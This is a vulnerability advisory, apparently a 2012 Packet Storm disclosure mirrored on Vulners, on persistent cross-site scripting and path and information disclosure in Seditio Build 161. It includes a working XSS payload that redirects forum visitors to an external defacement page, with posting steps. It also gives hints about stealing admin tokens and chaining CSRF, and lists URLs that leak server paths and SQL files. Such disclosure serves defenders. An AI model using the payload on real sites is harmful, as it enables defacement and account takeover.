Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Seditio Build 161 Cross Site Scripting / Information Disclosure

🗓️ 29 Mar 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Seditio Build 161 Cross Site Scripting and Information Disclosur

Code
`==========================================================  
Vulnerable Software: seditio-build161  
==========================================================  
Downloaded from:http://neocrome.net/page.php?id=2447&a=dl  
  
# md5sum sed*.rar  
aad96010a15f0c38e5cc321f8a91dd1b *seditio-build161.rar  
  
Installation:Standart (i assume with default settings)  
  
Tested:  
==========================================================  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
==========================================================  
Vuln Desc: PERSISTENT CROSS SITE SCRIPTING:  
==========================================================  
Exploitation:  
Create new topic(/forums.php?m=newtopic&s=1)  
using the following details:  
  
Topic Title: Whatever you want.  
Topic Description: Whatever you want.  
Body:  
Inject this:   
<a href="#" onmouseover="alert('You have Been Pwned) Meh Meh');window.top.location.href='http://defaced.tld/herewego.html'">You do not need click here!I will click it for you) Of course I ll pwn you)))</a>  
  
Post the topic.  
  
Then you'll see it as plaintext for first time.  
Click the *EDIT* button but do not touch anything after this and simply Push the *UPDATE* button.  
After update you'll return to your post.Try to over your mouse over the link.  
  
Same rules and exploitation also applies to *Reply* section.  
Remember you do not need touch anything after *edit* button you need only UPDATE the topic with your "payload" and thats all.  
@Print screen on success pwn:  
http://s43.radikal.ru/i099/1203/5d/2e2dfa119083.png  
  
Other attacks also possible using XSS to steal security tokens and exploitate CSRF (change password or deface site automatically) using   
document.body.innerHTML(to steal administrator tokens)  
==========================================================  
Ok now about Info And Path Disclosure:  
Try to Direct access:(Also previous versions too suffers from Info and Path disclosure)  
  
http://192.168.0.15/learn/9/seditio/view.php  
  
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21  
@http://www.neocrome.net/view.php  
  
http://192.168.0.15/learn/9/seditio/plugins/contact/lang/contact.en.lang.php  
  
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\plugins\contact\lang\contact.en.lang.php on line 37  
  
  
http://192.168.0.15/learn/9/seditio/system/lang/en/main.lang.php  
Notice: Undefined variable: cfg in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\main.lang.php on line 450  
  
  
http://192.168.0.15/learn/9/seditio/system/lang/en/message.lang.php  
  
  
Notice: Undefined variable: usr in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 37  
  
Notice: Undefined variable: num in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\lang\en\message.lang.php on line 104  
==============================================================================================================================  
http://192.168.0.15/learn/9/seditio/system/core/view/view.inc.php  
Parse error: syntax error, unexpected ')' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\9\seditio\system\core\view\view.inc.php on line 21  
  
@http://www.neocrome.net/system/core/view/view.inc.php  
  
===============================================================================================================================  
Info disclosure:  
http://192.168.0.15/learn/9/seditio/docs/new/seditio-createnew-160.sql  
http://192.168.0.15/learn/9/seditio/docs/upgrade/sedito_convert_to_utf8.optional.sql  
  
http://192.168.0.15/learn/9/seditio/system/install/install.parser.sql  
IMO Needs at least simply .htaccess rule to protect from eyes this files.  
===============================================================================================================================  
  
/AkaStep ^_^  
1332959725  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Mar 2012 00:00Current
7.4High risk
Vulners AI Score7.4
persistent xssapache 2.2.21.0php version 5.2.17.17mysql version 5.5.21exploitationreply sectioncsrfpath disclosuresyntax error
25